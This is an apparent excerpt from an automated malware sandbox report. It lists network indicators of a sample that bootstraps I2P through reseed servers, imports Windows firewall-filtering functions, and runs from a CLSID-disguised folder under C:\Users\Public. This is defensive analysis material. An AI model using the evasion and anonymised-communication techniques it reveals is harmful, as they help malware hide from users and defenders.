Source: update.pkg.11.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: vc71izwl68ub3txurufnpr09g6ni3.exe.1.dr, Static PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0
Source: DNS query: reseed-pl.i2pd.xyz
Source: unknown, DNS query: name: reseed.onion.im
Source: unknown, Network traffic detected: IP country count 26
Source: Joe Sandbox View IP Address: 31.3.152.100
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B9152A1A recv,WSAGetLastError,22_2_00007FF8B9152A1A
Source: global traffic HTTP traffic detected: GET https://reseed.memcpy.io:443/i2pseeds.su3 HTTP/1.0
    User-Agent: Wget/1.11.4
    Connection: close
Source: global traffic HTTP traffic detected: GET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0
    User-Agent: Wget/1.11.4
    Connection: close
Source: global traffic HTTP traffic detected: GET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0
    User-Agent: Wget/1.11.4
    Connection: close
Source: global traffic DNS traffic detected: DNS query: reseed.memcpy.io
Source: global traffic DNS traffic detected: DNS query: reseed-pl.i2pd.xyz
Source: global traffic DNS traffic detected: DNS query: reseed.i2pgit.org
Source: global traffic DNS traffic detected: DNS query: reseed.onion.im
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sun, 05 Jan 2025 16:49:42 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sun, 05 Jan 2025 16:49:43 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2456738676.0000022350291000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2456860774.0000022350297000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://127.0.0.1:8118
Source: svchost.exe, 0000001F.00000003.3199473486.000001D37989B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D379382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 0000001F.00000003.3183713515.000001D379377000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 0000001F.00000002.3263371493.000001D379800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3209006685.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 0000001F.00000002.3263426432.000001D379836000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263588064.000001D37988F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
Source: svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
Source: svchost.exe, 0000001F.00000002.3262697506.000001D378AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001F.00000002.3262697506.000001D378AC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3037162349.000001D379352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3036974940.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$
Source: svchost.exe, 0000001F.00000003.3143580946.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143291121.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112272695.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183931947.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143546975.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263042958.000001D379310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156417903.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183773272.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184036782.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3130778572.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183958551.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184178913.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143745371.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
0000001F.00000003.3199403669.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
Source: svchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
Source: svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
Source: svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
Source: svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262754497.000001D378AD2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3036974940.000001D379352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd$
Source: svchost.exe, 0000001F.00000003.3143580946.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143291121.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112272695.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183931947.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143546975.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263042958.000001D379310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156417903.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183773272.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184036782.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3130778572.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183958551.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184178913.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143745371.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
0000001F.00000003.3199403669.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
Source: svchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
Source: svchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
Source: svchost.exe, 0000001F.00000003.3037162349.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:
Source: svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://identiguy.i2p/hosts.txt
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263392705.000001D379813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
Source: update.pkg.11.drString found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txt9
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://rus.i2p/hosts.txt
Source: svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111952207.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111425069.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: svchost.exe, 0000001F.00000002.3263129207.000001D379337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policysrf
Source: svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scn
Source: svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
Source: svchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: update.pkg.11.drString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtF&P#
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz/i2pseeds.su30
Source: main.exe, 00000016.00000003.2484244836.00000223506CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz:443/i2pseeds.su3
Source: main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz:443/i2pseeds.su3T
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.diva.exchange/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.diva.exchange/b.c
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: https://reseed.i2p-projekt.de/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.i2pgit.org/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/P#
Source: main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/i2pseeds.su3
Source: main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/i2pseeds.su30
Source: main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org:443/i2pseeds.su3
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.memcpy.io/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.memcpy.io/hP#
Source: main.exe, 00000016.00000003.2471943070.000002235030D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471338802.0000022350309000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471413512.000002235030B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.memcpy.io:443/i2pseeds.su3
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/i2pseeds.su3
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/&
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/7
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/??
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/b.c
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed2.i2p.net/
Source: svchost.exe, 0000001F.00000003.3023799636.000001D379355000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://www2.mk16.de/
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.mk16.de/J
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
